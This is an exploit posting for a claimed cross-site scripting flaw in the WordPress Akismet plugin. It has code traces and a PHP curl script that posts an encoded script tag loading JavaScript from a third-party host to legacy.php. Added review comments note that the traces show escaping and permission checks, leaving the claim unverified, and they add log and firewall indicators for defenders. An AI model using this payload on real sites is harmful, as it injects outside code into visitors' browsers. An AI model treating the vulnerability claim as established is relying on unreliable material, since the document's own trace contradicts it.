
WordPress Akismet Cross Site Scripting

Posted on 03 October 2012

#########################################################
Exploit Title : Wordpress Akismet Cross-Site Scripting
Author : Nafsh
Discovered By : Tapco Security & Research Lab
Date : 2 Oct 2012
Home : http://Sec-Lab.Tap-Co.Net
Contact : Nafsh.Hack@Gmail.com
#########################################################
Source : http://wordpress.org/extend/plugins/akismet

Vulnerability is also triggered in: /wp-content/plugins/akismet/legacy.php
akismet_caught() is called.
231: echo echo attribute_escape($_POST['s']); // legacy.php
requires:
162: if(0 == $spam_count) else
228: if($comments)
231: if(isset($_POST['s']))
54: function akismet_caught()

Vulnerability is also triggered in: /wp-content/plugins/akismet/admin.php
akismet_add_comment_author_url() is called.
773: print print (wp_update_comment($comment)); // admin.php
771: $comment['comment_author_url'] = esc_url($_POST['url']); // admin.php
requires:
767: if(!empty($_POST['id']) && !empty($_POST['url']) && check_admin_referer('comment_author_url_nonce'))
770: if(current_user_can('edit_comment', $comment['comment_ID']))
766: function akismet_add_comment_author_url()
#########################################################
exploit :
#!/usr/bin/php -f
<?php
#
# legacy.php curl exploit
#
//
// HTTP POST,
//

// Proof-of-concept as published: sends a single HTTP POST to the Akismet
// plugin's legacy.php on the host named by the first command-line argument
// and prints whatever the server returns.
//
// NOTE(review): the advisory's own trace for legacy.php lists the output
// statement as `echo attribute_escape($_POST['s'])`, i.e. the value passes
// through an escaping function before it is printed. The admin.php trace
// likewise shows esc_url(), a check_admin_referer() nonce check and a
// current_user_can() capability check in front of the flagged call. No
// unescaped sink is shown on this page, and no affected plugin version is
// given, so treat the cross-site scripting claim as unverified until it is
// reproduced against a specific release.
//
// NOTE(review): the trace places the echo inside akismet_caught(); whether
// that function runs at all when legacy.php is requested directly, as this
// script does, is not shown here. Confirm before relying on the report.

// Target host comes straight from argv with no validation; it is
// interpolated into both the request URL and the cookie-jar path below.
$target = $argv[1];

$ch = curl_init();
// Return the response body from curl_exec() instead of printing it directly.
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
// Plain-HTTP request to the plugin file itself, not to a WordPress admin page.
// For defenders: direct requests to PHP files under wp-content/plugins/ are
// something a web-server rule or WAF can deny outright.
curl_setopt($ch, CURLOPT_URL, "http://$target/wp-content/plugins/akismet/legacy.php");
// Fixed, long-obsolete browser string; combined with a POST to this path it
// is a usable indicator when searching access logs for this script.
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
// One form field, `s`, carrying percent-encoded markup that references a
// script on a third-party host. The field name matches the $_POST['s'] read
// shown in the legacy.php trace above.
curl_setopt($ch, CURLOPT_POSTFIELDS, "s=%2522%253E%253Cscript%2520src%253d%2F%2Fsantanafest.com.br%2Fenquete%2Fc%253E%253C%2Fscript%253E");
// Give up after 3 seconds overall, or if throughput stays below 3 bytes/s
// for 3 seconds.
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
// Cookies received are written to a predictable file name under /tmp that is
// derived from the unvalidated argument; anyone running this for analysis
// should do so in a throwaway environment.
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
// curl_exec() returns the body as a string, or false on failure; the result
// is not checked, so a failed request simply prints nothing.
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
// Raw, untrusted server response written to stdout.
echo $buf;
?>
######################################################### We are : K0242 | Nafsh | Ehram.shahmohamadi ######################################################### Tnx : Am!r | M.R.S.CO All Members In Www.IrIsT.Ir & Www.IdC-TeAm.NeT ######################################################### Greetz : All sec-lab researchers

 
